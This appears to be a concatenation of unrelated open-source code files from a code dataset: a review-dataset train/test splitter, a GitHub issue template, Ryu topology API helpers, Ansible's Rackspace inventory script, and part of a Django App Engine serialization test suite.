        (rating, a, b, c, body) = self.read_clean_reviews()
        rating = np.array(rating)
        body = pd.Series(body)
        train_file = (self.REVIEWS_PATH + klass + "class-" +
                      balanced + "-train.txt")
        test_file = (self.REVIEWS_PATH + klass + "class-" +
                     balanced + "-test.txt")
        validation_file = (self.REVIEWS_PATH + klass + "class-" +
                           balanced + "-validation.txt")
        train_ids = self.read_file(train_file)
        test_ids = self.read_file(test_file)
        validation_ids = self.read_file(validation_file)
        train_y = rating[train_ids]
        test_y = rating[test_ids]
        valid_y = rating[validation_ids]
        train_x = body[train_ids]
        test_x = body[test_ids]
        valid_x = body[validation_ids]
        if klass == "2":
            self.set_binary_klass(train_y)
            self.set_binary_klass(test_y)
            self.set_binary_klass(valid_y)
        elif klass == "3":
            self.set_ternary_klass(train_y)
            self.set_ternary_klass(test_y)
            self.set_ternary_klass(valid_y)
        return (train_x, train_y, test_x, test_y, valid_x, valid_y)

    # Like split_train_validation_test_3class, but first down-samples the
    # whole dataset to tiny_precent of its size while preserving the
    # original class proportions ("tiny" split for quick experiments).
    def split_train_validation_test_3class_tiny(self, rating, tiny_precent, percent_test, percent_valid,
                                                balanced="unbalanced"):
        np.random.seed(1234)
        rating = np.array(rating, dtype='int32')
        # length
        num_reviews = len(rating)
        review_ids = np.arange(0, num_reviews)
        # convert to binary, with ratings [1, 2] --> neg and [4, 5] --> pos
        rating[rating == 2] = 1
        rating[rating == 4] = 5
        ids = (rating == 1) + (rating == 5) + (rating == 3)
        review_ids = review_ids[ids]
        rating = rating[ids]
        rating[rating == 1] = 0
        rating[rating == 5] = 1
        rating[rating == 3] = 2
        # get length after filtering
        num_reviews = rating.shape[0]
        # per-class quotas that preserve the original class proportions
        new_data_size = int(np.floor(tiny_precent * rating.shape[0]))
        positive_reviews_precent = np.sum(rating == 1) * 1.0 / rating.shape[0]
        negative_reviews_precent = np.sum(rating == 0) * 1.0 / rating.shape[0]
        neutral_reviews_precent = np.sum(rating == 2) * 1.0 / rating.shape[0]
        new_postive_size = np.round(positive_reviews_precent * tiny_precent * num_reviews)
        new_negative_size = np.round(negative_reviews_precent * tiny_precent * num_reviews)
        new_neutral_size = np.round(neutral_reviews_precent * tiny_precent * num_reviews)
        np.random.shuffle(review_ids)
        # greedily fill the per-class quotas from the shuffled ids
        selected_ids = np.zeros(new_data_size,dtype='int32')
        i=0
        j=0
        count_pos=0
        count_neg=0
        count_neutral=0
        while(j<new_data_size):
            if(rating[review_ids[i]]==1 and count_pos< new_postive_size):
                selected_ids[j]=np.int(review_ids[i])
                count_pos+=1
                j+=1
            elif(rating[review_ids[i]]==0 and count_neg< new_negative_size):
                selected_ids[j]=np.int(review_ids[i])
                count_neg+=1
                j+=1
            elif(rating[review_ids[i]]==2 and count_neutral< new_neutral_size):
                selected_ids[j]=np.int(review_ids[i])
                count_neutral+=1
                j+=1
            i+=1
        if balanced == "unbalanced":
            ntest = np.floor(new_data_size * percent_test)
            nvalid = np.floor(new_data_size * percent_valid)
            np.random.shuffle(selected_ids)
            test_ids = selected_ids[:ntest]
            validation_ids = selected_ids[ntest:ntest + nvalid]
            train_ids = selected_ids[ntest + nvalid:]
        elif balanced == "balanced":
            (sizes, bins) = np.histogram(rating, [0, 1, 2, 3])
            min_size = np.min(sizes)
            print min_size
            # sample review ids equally among classes
            test_ids = np.zeros((0,), dtype="int32")
            validation_ids = np.zeros((0,), dtype="int32")
            train_ids = np.zeros((0,), dtype="int32")
            rating = np.array(rating)
            ntest = np.floor(min_size * percent_test)
            nvalid = np.floor(min_size * percent_valid)
            for c in [0, 1, 2]:
                cids = selected_ids[np.nonzero(rating == c)]
                np.random.shuffle(cids)
                test_ids = np.r_[test_ids, cids[:ntest]]
                validation_ids = np.r_[validation_ids, cids[ntest:ntest + nvalid]]
                train_ids = np.r_[train_ids, cids[ntest + nvalid:min_size]]
        train_file = self.REVIEWS_PATH + "3class-" + balanced + "-tiny-train.txt"
        test_file = self.REVIEWS_PATH + "3class-" + balanced + "-tiny-test.txt"
        validation_file = self.REVIEWS_PATH + "3class-" + balanced + "-tiny-validation.txt"
        open(train_file, 'w').write('\n'.join(map(str, train_ids)))
        open(test_file, 'w').write('\n'.join(map(str, test_ids)))
        open(validation_file, 'w').write('\n'.join(map(str, validation_ids)))
        return (train_ids, test_ids)
# l=LABR()
# (rating, a, b, c, body)=l.read_clean_reviews()
# l.split_train_validation_test_3class_tiny(rating,0.1, 0.2, 0.2) | unknown | codeparrot/codeparrot-clean | ||
blank_issues_enabled: false
contact_links:
- name: Question
url: https://github.com/abseil/abseil-cpp/discussions
about: Have a question? Ask us anything! :-) | unknown | github | https://github.com/mysql/mysql-server | extra/abseil/abseil-cpp-20230802.1/.github/ISSUE_TEMPLATE/config.yml |
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ryu.base import app_manager
from ryu.topology import event
def get_switch(app, dpid=None):
rep = app.send_request(event.EventSwitchRequest(dpid))
return rep.switches
def get_all_switch(app):
return get_switch(app)
def get_link(app, dpid=None):
rep = app.send_request(event.EventLinkRequest(dpid))
return rep.links
def get_all_link(app):
return get_link(app)
def get_host(app, dpid=None):
rep = app.send_request(event.EventHostRequest(dpid))
return rep.hosts
def get_all_host(app):
    """Convenience wrapper: request every host (no dpid filter)."""
    return get_host(app, None)
app_manager.require_app('ryu.topology.switches', api_style=True) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# (c) 2013, Jesse Keating <jesse.keating@rackspace.com,
# Paul Durivage <paul.durivage@rackspace.com>,
# Matt Martz <matt@sivel.net>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Rackspace Cloud Inventory
Authors:
Jesse Keating <jesse.keating@rackspace.com,
Paul Durivage <paul.durivage@rackspace.com>,
Matt Martz <matt@sivel.net>
Description:
Generates inventory that Ansible can understand by making API request to
Rackspace Public Cloud API
When run against a specific host, this script returns variables similar to:
rax_os-ext-sts_task_state
rax_addresses
rax_links
rax_image
rax_os-ext-sts_vm_state
rax_flavor
rax_id
rax_rax-bandwidth_bandwidth
rax_user_id
rax_os-dcf_diskconfig
rax_accessipv4
rax_accessipv6
rax_progress
rax_os-ext-sts_power_state
rax_metadata
rax_status
rax_updated
rax_hostid
rax_name
rax_created
rax_tenant_id
rax_loaded
Configuration:
rax.py can be configured using a rax.ini file or via environment
variables. The rax.ini file should live in the same directory along side
this script.
The section header for configuration values related to this
inventory plugin is [rax]
[rax]
creds_file = ~/.rackspace_cloud_credentials
regions = IAD,ORD,DFW
env = prod
meta_prefix = meta
access_network = public
access_ip_version = 4
Each of these configurations also has a corresponding environment variable.
An environment variable will override a configuration file value.
creds_file:
Environment Variable: RAX_CREDS_FILE
An optional configuration that points to a pyrax-compatible credentials
file.
If not supplied, rax.py will look for a credentials file
at ~/.rackspace_cloud_credentials. It uses the Rackspace Python SDK,
and therefore requires a file formatted per the SDK's specifications.
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
regions:
Environment Variable: RAX_REGION
An optional environment variable to narrow inventory search
scope. If used, needs a value like ORD, DFW, SYD (a Rackspace
datacenter) and optionally accepts a comma-separated list.
environment:
Environment Variable: RAX_ENV
A configuration that will use an environment as configured in
~/.pyrax.cfg, see
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
meta_prefix:
Environment Variable: RAX_META_PREFIX
Default: meta
A configuration that changes the prefix used for meta key/value groups.
For compatibility with ec2.py set to "tag"
access_network:
Environment Variable: RAX_ACCESS_NETWORK
Default: public
A configuration that will tell the inventory script to use a specific
server network to determine the ansible_ssh_host value. If no address
is found, ansible_ssh_host will not be set. Accepts a comma-separated
list of network names, the first found wins.
access_ip_version:
Environment Variable: RAX_ACCESS_IP_VERSION
Default: 4
A configuration related to "access_network" that will attempt to
determine the ansible_ssh_host value for either IPv4 or IPv6. If no
address is found, ansible_ssh_host will not be set.
Acceptable values are: 4 or 6. Values other than 4 or 6
will be ignored, and 4 will be used. Accepts a comma-separated list,
the first found wins.
Examples:
List server instances
$ RAX_CREDS_FILE=~/.raxpub rax.py --list
List servers in ORD datacenter only
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD rax.py --list
List servers in ORD and DFW datacenters
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD,DFW rax.py --list
Get server details for server named "server.example.com"
$ RAX_CREDS_FILE=~/.raxpub rax.py --host server.example.com
Use the instance private IP to connect (instead of public IP)
$ RAX_CREDS_FILE=~/.raxpub RAX_ACCESS_NETWORK=private rax.py --list
"""
import os
import re
import sys
import argparse
import warnings
import collections
import ConfigParser
from six import iteritems
try:
import json
except ImportError:
import simplejson as json
try:
import pyrax
from pyrax.utils import slugify
except ImportError:
sys.exit('pyrax is required for this module')
from time import time
from ansible.constants import get_config
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.module_utils.six import text_type
NON_CALLABLES = (text_type, str, bool, dict, int, list, type(None))
def load_config_file():
    """Parse the rax.ini that sits next to this script.

    Returns the ConfigParser instance, or None when the file exists but
    cannot be parsed. (A missing file simply yields an empty parser.)
    """
    config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                               'rax.ini')
    parser = ConfigParser.ConfigParser()
    try:
        parser.read(config_file)
    except ConfigParser.Error:
        return None
    return parser
p = load_config_file()
def rax_slugify(value):
    """Normalize *value* into a host-variable name prefixed with 'rax_'.

    Every character that is not alphanumeric, underscore or hyphen becomes
    an underscore; the result is lower-cased and leading underscores are
    stripped before the prefix is attached.
    """
    cleaned = re.sub(r'[^\w-]', '_', value).lower().lstrip('_')
    return 'rax_%s' % cleaned
def to_dict(obj):
    """Collect the public, non-callable attributes of *obj* into a dict.

    Attribute names are slugified with rax_slugify() so they are safe to
    use as Ansible host variables.
    """
    result = {}
    for attr in dir(obj):
        value = getattr(obj, attr)
        if not attr.startswith('_') and isinstance(value, NON_CALLABLES):
            result[rax_slugify(attr)] = value
    return result
def host(regions, hostname):
    """Print JSON host variables for the server named *hostname*.

    Scans every region in *regions* for a server with a matching name;
    if the name exists in several regions the last match wins.
    """
    hostvars = {}
    for region in regions:
        # Connect to the region
        cloudservers = pyrax.connect_to_cloudservers(region=region)
        for server in cloudservers.servers.list():
            if server.name != hostname:
                continue
            hostvars.update(to_dict(server))
            # Use the public IPv4 address for SSH connectivity.
            hostvars['ansible_ssh_host'] = server.accessIPv4
    print(json.dumps(hostvars, sort_keys=True, indent=4))
def _list_into_cache(regions):
    """Build the full inventory for *regions* and write it to the cache file.

    Produces the Ansible dynamic-inventory structure: groups keyed by
    region, metadata, instance id, flavor and image, plus a '_meta'
    section carrying per-host variables.
    """
    groups = collections.defaultdict(list)
    hostvars = collections.defaultdict(dict)
    images = {}
    # Per-region map of server_id -> boot-volume image info, filled lazily.
    cbs_attachments = collections.defaultdict(dict)

    prefix = get_config(p, 'rax', 'meta_prefix', 'RAX_META_PREFIX', 'meta')

    try:
        # Ansible 2.3+
        networks = get_config(p, 'rax', 'access_network',
                              'RAX_ACCESS_NETWORK', 'public',
                              value_type='list')
    except TypeError:
        # Ansible 2.2.x and below
        # pylint: disable=unexpected-keyword-arg
        networks = get_config(p, 'rax', 'access_network',
                              'RAX_ACCESS_NETWORK', 'public', islist=True)
    try:
        try:
            # Ansible 2.3+
            ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
                                              'RAX_ACCESS_IP_VERSION', 4,
                                              value_type='list'))
        except TypeError:
            # Ansible 2.2.x and below
            # pylint: disable=unexpected-keyword-arg
            ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
                                              'RAX_ACCESS_IP_VERSION', 4,
                                              islist=True))
    except:  # noqa: E722 -- any malformed config value falls back to IPv4
        ip_versions = [4]
    else:
        # Only 4 and 6 are meaningful; anything else is dropped.
        ip_versions = [v for v in ip_versions if v in [4, 6]]
        if not ip_versions:
            ip_versions = [4]

    # Go through all the regions looking for servers
    for region in regions:
        # Connect to the region
        cs = pyrax.connect_to_cloudservers(region=region)
        if cs is None:
            warnings.warn(
                'Connecting to Rackspace region "%s" has caused Pyrax to '
                'return None. Is this a valid region?' % region,
                RuntimeWarning)
            continue
        for server in cs.servers.list():
            # Create a group on region
            groups[region].append(server.name)

            # Check if group metadata key in servers' metadata
            group = server.metadata.get('group')
            if group:
                groups[group].append(server.name)

            for extra_group in server.metadata.get('groups', '').split(','):
                if extra_group:
                    groups[extra_group].append(server.name)

            # Add host metadata
            for key, value in to_dict(server).items():
                hostvars[server.name][key] = value

            hostvars[server.name]['rax_region'] = region

            for key, value in iteritems(server.metadata):
                groups['%s_%s_%s' % (prefix, key, value)].append(server.name)

            groups['instance-%s' % server.id].append(server.name)
            groups['flavor-%s' % server.flavor['id']].append(server.name)

            # Handle boot from volume: such servers report no image, so the
            # image is recovered from the bootable block-storage volume.
            if not server.image:
                if not cbs_attachments[region]:
                    cbs = pyrax.connect_to_cloud_blockstorage(region)
                    for vol in cbs.list():
                        if boolean(vol.bootable, strict=False):
                            for attachment in vol.attachments:
                                metadata = vol.volume_image_metadata
                                server_id = attachment['server_id']
                                cbs_attachments[region][server_id] = {
                                    'id': metadata['image_id'],
                                    'name': slugify(metadata['image_name'])
                                }
                image = cbs_attachments[region].get(server.id)
                if image:
                    server.image = {'id': image['id']}
                    hostvars[server.name]['rax_image'] = server.image
                    hostvars[server.name]['rax_boot_source'] = 'volume'
                    images[image['id']] = image['name']
                else:
                    hostvars[server.name]['rax_boot_source'] = 'local'

            # Group by image: prefer the human-readable name, falling back to
            # the raw image id when the image cannot be resolved.
            try:
                imagegroup = 'image-%s' % images[server.image['id']]
                groups[imagegroup].append(server.name)
                groups['image-%s' % server.image['id']].append(server.name)
            except KeyError:
                try:
                    image = cs.images.get(server.image['id'])
                except cs.exceptions.NotFound:
                    groups['image-%s' % server.image['id']].append(server.name)
                else:
                    images[image.id] = image.human_id
                    groups['image-%s' % image.human_id].append(server.name)
                    groups['image-%s' % server.image['id']].append(server.name)

            # And finally, add an IP address: first network in `networks`
            # that yields an address of an accepted IP version wins.
            ansible_ssh_host = None
            # use accessIPv[46] instead of looping address for 'public'
            for network_name in networks:
                if ansible_ssh_host:
                    break
                if network_name == 'public':
                    for version_name in ip_versions:
                        if ansible_ssh_host:
                            break
                        if version_name == 6 and server.accessIPv6:
                            ansible_ssh_host = server.accessIPv6
                        elif server.accessIPv4:
                            ansible_ssh_host = server.accessIPv4
                if not ansible_ssh_host:
                    addresses = server.addresses.get(network_name, [])
                    for address in addresses:
                        for version_name in ip_versions:
                            if ansible_ssh_host:
                                break
                            if address.get('version') == version_name:
                                ansible_ssh_host = address.get('addr')
                                break
            if ansible_ssh_host:
                hostvars[server.name]['ansible_ssh_host'] = ansible_ssh_host

    if hostvars:
        groups['_meta'] = {'hostvars': hostvars}

    with open(get_cache_file_path(regions), 'w') as cache_file:
        json.dump(groups, cache_file)
def get_cache_file_path(regions):
    """Return the per-user cache file path for this set of regions.

    Creates ~/.ansible/tmp on first use; the filename embeds the pyrax
    username and the normalized region list so different credential/region
    combinations get separate caches.
    """
    region_key = '.'.join(reg.strip().lower() for reg in regions)
    cache_dir = os.path.join(os.path.expanduser("~"), '.ansible', 'tmp')
    if not os.path.exists(cache_dir):
        os.makedirs(cache_dir)
    filename = 'ansible-rax-%s-%s.cache' % (pyrax.identity.username,
                                            region_key)
    return os.path.join(cache_dir, filename)
def _list(regions, refresh_cache=True):
    """Print the full inventory, rebuilding the cache file when needed.

    The cache is rebuilt when explicitly requested, when the file is
    missing, or when it is older than cache_max_age seconds.
    """
    cache_max_age = int(get_config(p, 'rax', 'cache_max_age',
                                   'RAX_CACHE_MAX_AGE', 600))

    cache_path = get_cache_file_path(regions)
    cache_stale = (not os.path.exists(cache_path) or
                   (time() - os.stat(cache_path)[-1]) > cache_max_age)
    if refresh_cache or cache_stale:
        _list_into_cache(regions)

    with open(cache_path, 'r') as cache_file:
        groups = json.load(cache_file)
    print(json.dumps(groups, sort_keys=True, indent=4))
def parse_args():
    """Parse command line options.

    Exactly one of --list or --host is required (mutually exclusive);
    --refresh-cache forces the inventory cache to be rebuilt before
    listing.
    """
    parser = argparse.ArgumentParser(description='Ansible Rackspace Cloud '
                                                 'inventory module')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('--list', action='store_true',
                       help='List active servers')
    group.add_argument('--host', help='List details about the specific host')
    # Fixed: the original implicit string concatenation produced
    # "...making API requests toRackSpace..." (missing space).
    parser.add_argument('--refresh-cache', action='store_true', default=False,
                        help=('Force refresh of cache, making API requests '
                              'to RackSpace (default: False - use cache '
                              'files)'))
    return parser.parse_args()
def setup():
    """Authenticate against Rackspace via pyrax and return the region list.

    Credential sources, in priority order: a keyring username configured
    in pyrax, the creds_file/RAX_CREDS_FILE setting, then the default
    ~/.rackspace_cloud_credentials file. Exits the process on
    authentication failure or unusable configuration.
    """
    default_creds_file = os.path.expanduser('~/.rackspace_cloud_credentials')

    env = get_config(p, 'rax', 'environment', 'RAX_ENV', None)
    if env:
        pyrax.set_environment(env)

    keyring_username = pyrax.get_setting('keyring_username')

    # Attempt to grab credentials from environment first
    creds_file = get_config(p, 'rax', 'creds_file',
                            'RAX_CREDS_FILE', None)
    if creds_file is not None:
        creds_file = os.path.expanduser(creds_file)
    else:
        # But if that fails, use the default location of
        # ~/.rackspace_cloud_credentials
        if os.path.isfile(default_creds_file):
            creds_file = default_creds_file
        elif not keyring_username:
            sys.exit('No value in environment variable %s and/or no '
                     'credentials file at %s'
                     % ('RAX_CREDS_FILE', default_creds_file))

    identity_type = pyrax.get_setting('identity_type')
    pyrax.set_setting('identity_type', identity_type or 'rackspace')

    region = pyrax.get_setting('region')

    try:
        if keyring_username:
            pyrax.keyring_auth(keyring_username, region=region)
        else:
            pyrax.set_credential_file(creds_file, region=region)
    except Exception as e:
        # NOTE(review): e.message is Python 2 only -- confirm before porting.
        sys.exit("%s: %s" % (e, e.message))

    regions = []
    if region:
        # A region pinned in the pyrax settings overrides the config list.
        regions.append(region)
    else:
        try:
            # Ansible 2.3+
            region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
                                     value_type='list')
        except TypeError:
            # Ansible 2.2.x and below
            # pylint: disable=unexpected-keyword-arg
            region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
                                     islist=True)

        for region in region_list:
            region = region.strip().upper()
            if region == 'ALL':
                regions = pyrax.regions
                break
            elif region not in pyrax.regions:
                sys.exit('Unsupported region %s' % region)
            elif region not in regions:
                regions.append(region)

    return regions
def main():
    """Entry point: authenticate against Rackspace, then run the query."""
    options = parse_args()
    regions = setup()
    if options.list:
        _list(regions, refresh_cache=options.refresh_cache)
    elif options.host:
        host(regions, options.host)
    # Always exit successfully; error paths bail out earlier via sys.exit(msg).
    sys.exit(0)
# Script entry point when executed directly (e.g. by Ansible).
if __name__ == '__main__':
    main()
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that the serialization modules are functioning correctly.
In particular, these tests verify that the modifications made to the standard
Django serialization modules function correctly and that the combined datastore
and Django models can be dumped and loaded to all of the provided formats.
"""
import os
import re
import unittest
from StringIO import StringIO
from django.core import serializers
from google.appengine.ext import db
from appengine_django.models import BaseModel
class ModelA(BaseModel):
  # Minimal model; also used as the referenced ("friend"/parent) target
  # in the tests below.
  description = db.StringProperty()
class ModelB(BaseModel):
  # Model holding a Reference property, for testing key serialization.
  description = db.StringProperty()
  friend = db.Reference(ModelA)
class ModelC(BaseModel):
  # All three properties auto-populate at creation time, exercising
  # datetime/date/time round-tripping through each serialization format.
  dt_value = db.DateTimeProperty(auto_now_add=True)
  d_value = db.DateProperty(auto_now_add=True)
  t_value = db.TimeProperty(auto_now_add=True)
class TestAllFormats(type):
  def __new__(cls, name, bases, attrs):
    """Extends base test functions to be called for every serialisation format.

    Looks for functions matching 'run.*Test', where the wildcard in the middle
    matches the desired test name and ensures that a test case is setup to call
    that function once for every defined serialisation format. The test case
    that is created will be called 'test<format><name>'. Eg, for the function
    'runKeyedObjectTest' functions like 'testJsonKeyedObject' will be created.
    """
    test_formats = serializers.get_serializer_formats()
    test_formats.remove("python")  # Python serializer is only used indirectly.

    def make_test(func_name, format):
      # Bind func_name/format now: a plain lambda in the loop would
      # late-bind and every generated test would call the last format.
      return lambda self: getattr(self, func_name)(format)

    # Iterate over a snapshot since new test methods are added to attrs
    # inside the loop (also required on Python 3, where keys() is a view).
    for func_name in list(attrs):
      m = re.match("^run(.*)Test$", func_name)
      if not m:
        continue
      for format in test_formats:
        test_name = "test%s%s" % (format.title(), m.group(1))
        # A closure is clearer and safer than building source text for
        # eval(), which broke for any format name containing quotes.
        attrs[test_name] = make_test(func_name, format)
    return super(TestAllFormats, cls).__new__(cls, name, bases, attrs)
class SerializationTest(unittest.TestCase):
  """Unit tests for the serialization/deserialization functionality.

  Tests that every loaded serialization format can successfully dump and then
  reload objects without the objects changing.
  """
  # The metaclass expands every run*Test method below into one
  # test<Format><Name> method per registered serialization format.
  __metaclass__ = TestAllFormats

  def compareObjects(self, orig, new, format="unknown"):
    """Compares two objects to ensure they are identical.

    Args:
      orig: The original object, must be an instance of db.Model.
      new: The new object, must be an instance of db.Model.
      format: The serialization format being tested, used to make error output
        more helpful.

    Raises:
      The function has no return value, but will raise assertion errors if the
      objects do not match correctly.
    """
    if orig.key().name():
      # Only compare object keys when the key is named. Key IDs are not static
      # and will change between dump/load. If you want stable Keys they need to
      # be named!
      self.assertEqual(orig.key(), new.key(),
                       "keys not equal after %s serialization: %s != %s" %
                       (format, repr(orig.key()), repr(new.key())))
    for key in orig.properties().keys():
      oval = getattr(orig, key)
      nval = getattr(new, key)
      if isinstance(orig.properties()[key], db.Reference):
        # Need to compare object keys not the objects themselves.
        oval = oval.key()
        nval = nval.key()
      self.assertEqual(oval, nval, "%s attribute differs after %s "
                       "serialization: %s != %s" % (key, format, oval, nval))

  def doSerialisationTest(self, format, obj, rel_attr=None, obj_ref=None):
    """Runs a serialization test on an object for the specified format.

    Args:
      format: The name of the Django serialization class to use.
      obj: The object to {,de}serialize, must be an instance of db.Model.
      rel_attr: Name of the attribute of obj references another model.
      obj_ref: The expected object reference, must be an instance of db.Model.

    Raises:
      The function has no return value but raises assertion errors if the
      object cannot be successfully serialized and then deserialized back to an
      identical object. If rel_attr and obj_ref are specified the deserialized
      object must also retain the references from the original object.
    """
    serialised = serializers.serialize(format, [obj])
    # Try and get the object back from the serialized string.
    result = list(serializers.deserialize(format, StringIO(serialised)))
    self.assertEqual(1, len(result),
                     "%s serialization should create 1 object" % format)
    result[0].save()  # Must save back into the database to get a Key.
    self.compareObjects(obj, result[0].object, format)
    if rel_attr and obj_ref:
      rel = getattr(result[0].object, rel_attr)
      if callable(rel):
        rel = rel()
      self.compareObjects(rel, obj_ref, format)

  def doLookupDeserialisationReferenceTest(self, lookup_dict, format):
    """Tests the Key reference is loaded OK for a format.

    Args:
      lookup_dict: A dictionary indexed by format containing serialized strings
        of the objects to load.
      format: The format to extract from the dict and deserialize.

    Raises:
      This function has no return value but raises assertion errors if the
      string cannot be deserialized correctly or the resulting object does not
      reference the object correctly.
    """
    if format not in lookup_dict:
      # Check not valid for this format.
      return
    obj = ModelA(description="test object", key_name="test")
    obj.put()
    s = lookup_dict[format]
    result = list(serializers.deserialize(format, StringIO(s)))
    self.assertEqual(1, len(result), "expected 1 object from %s" % format)
    result[0].save()
    self.compareObjects(obj, result[0].object.friend, format)

  def doModelKeyDeserialisationReferenceTest(self, lookup_dict, format):
    """Tests a model with a key can be loaded OK for a format.

    Args:
      lookup_dict: A dictionary indexed by format containing serialized strings
        of the objects to load.
      format: The format to extract from the dict and deserialize.

    Returns:
      This function has no return value but raises assertion errors if the
      string cannot be deserialized correctly or the resulting object is not an
      instance of ModelA with a key named 'test'.
    """
    if format not in lookup_dict:
      # Check not valid for this format.
      return
    s = lookup_dict[format]
    result = list(serializers.deserialize(format, StringIO(s)))
    self.assertEqual(1, len(result), "expected 1 object from %s" % format)
    result[0].save()
    self.assert_(isinstance(result[0].object, ModelA))
    self.assertEqual("test", result[0].object.key().name())

  # Lookup dicts for the above (doLookupDeserialisationReferenceTest) function.
  SERIALIZED_WITH_KEY_AS_LIST = {
      "json": """[{"pk": "agR0ZXN0chMLEgZNb2RlbEIiB21vZGVsYmkM", """
              """"model": "tests.modelb", "fields": {"description": "test", """
              """"friend": ["ModelA", "test"] }}]""",
      "yaml": """- fields: {description: !!python/unicode 'test', friend: """
              """ [ModelA, test]}\n model: tests.modelb\n pk: """
              """ agR0ZXN0chMLEgZNb2RlbEEiB21vZGVsYWkM\n"""
  }
  SERIALIZED_WITH_KEY_REPR = {
      "json": """[{"pk": "agR0ZXN0chMLEgZNb2RlbEIiB21vZGVsYmkM", """
              """"model": "tests.modelb", "fields": {"description": "test", """
              """"friend": "datastore_types.Key.from_path("""
              """'ModelA', 'test')" }}]""",
      "yaml": """- fields: {description: !!python/unicode 'test', friend: """
              """\'datastore_types.Key.from_path("ModelA", "test")\'}\n """
              """model: tests.modelb\n pk: """
              """ agR0ZXN0chMLEgZNb2RlbEEiB21vZGVsYWkM\n"""
  }

  # Lookup dict for the doModelKeyDeserialisationReferenceTest function.
  MK_SERIALIZED_WITH_LIST = {
      "json": """[{"pk": ["ModelA", "test"], "model": "tests.modela", """
              """"fields": {}}]""",
      "yaml": """-\n fields: {description: null}\n model: tests.modela\n """
              """pk: [ModelA, test]\n"""
  }
  MK_SERIALIZED_WITH_KEY_REPR = {
      "json": """[{"pk": "datastore_types.Key.from_path('ModelA', 'test')", """
              """"model": "tests.modela", "fields": {}}]""",
      "yaml": """-\n fields: {description: null}\n model: tests.modela\n """
              """pk: \'datastore_types.Key.from_path("ModelA", "test")\'\n"""
  }
  MK_SERIALIZED_WITH_KEY_AS_TEXT = {
      "json": """[{"pk": "test", "model": "tests.modela", "fields": {}}]""",
      "yaml": """-\n fields: {description: null}\n model: tests.modela\n """
              """pk: test\n"""
  }

  # Lookup dict for the runObjectWithNonExistantParentTest function.
  SERIALIZED_WITH_NON_EXISTANT_PARENT = {
      "json": """[{"pk": "ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yIgsSBk1vZG"""
              """VsQiIGcGFyZW50DAsSBk1vZGVsQSIEdGVzdAw", """
              """"model": "tests.modela", "fields": """
              """{"description": null}}]""",
      "yaml": """- fields: {description: null}\n """
              """model: tests.modela\n """
              """pk: ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yIgsSBk1"""
              """vZGVsQiIGcGFyZW50DAsSBk1vZGVsQSIEdGVzdAw\n""",
      "xml": """<?xml version="1.0" encoding="utf-8"?>\n"""
             """<django-objects version="1.0">\n"""
             """<entity kind="tests.modela" key="ahhnb29nbGUtYXBwL"""
             """WVuZ2luZS1kamFuZ29yIgsSBk1vZGVsQiIGcGFyZW50DA"""
             """sSBk1vZGVsQSIEdGVzdAw">\n  """
             """<key>tag:google-app-engine-django.gmail.com,"""
             """2008-05-13:ModelA[ahhnb29nbGUtYXBwLWVuZ2luZS1kam"""
             """FuZ29yIgsSBk1vZGVsQiIGcGFyZW50DAsSBk1vZGVsQSIEdGVzdAw"""
             """]</key>\n  <property name="description" """
             """type="null"></property>\n</entity>\n</django-objects>"""
  }

  # The following functions are all expanded by the metaclass to be run once
  # for every registered Django serialization module.

  def runKeyedObjectTest(self, format):
    """Test serialization of a basic object with a named key."""
    obj = ModelA(description="test object", key_name="test")
    obj.put()
    self.doSerialisationTest(format, obj)

  def runObjectWithIdTest(self, format):
    """Test serialization of a basic object with a numeric ID key."""
    obj = ModelA(description="test object")
    obj.put()
    self.doSerialisationTest(format, obj)

  def runObjectWithReferenceTest(self, format):
    """Test serialization of an object that references another object."""
    obj = ModelA(description="test object", key_name="test")
    obj.put()
    obj2 = ModelB(description="friend object", friend=obj)
    obj2.put()
    self.doSerialisationTest(format, obj2, "friend", obj)

  def runObjectWithParentTest(self, format):
    """Test serialization of an object that has a parent object reference."""
    obj = ModelA(description="parent object", key_name="parent")
    obj.put()
    obj2 = ModelA(description="child object", key_name="child", parent=obj)
    obj2.put()
    self.doSerialisationTest(format, obj2, "parent", obj)

  def runObjectWithNonExistantParentTest(self, format):
    """Test deserialization of an object referencing a non-existent parent."""
    self.doModelKeyDeserialisationReferenceTest(
        self.SERIALIZED_WITH_NON_EXISTANT_PARENT, format)

  def runCreateKeyReferenceFromListTest(self, format):
    """Tests that a reference specified as a list in json/yaml can be loaded OK."""
    self.doLookupDeserialisationReferenceTest(self.SERIALIZED_WITH_KEY_AS_LIST,
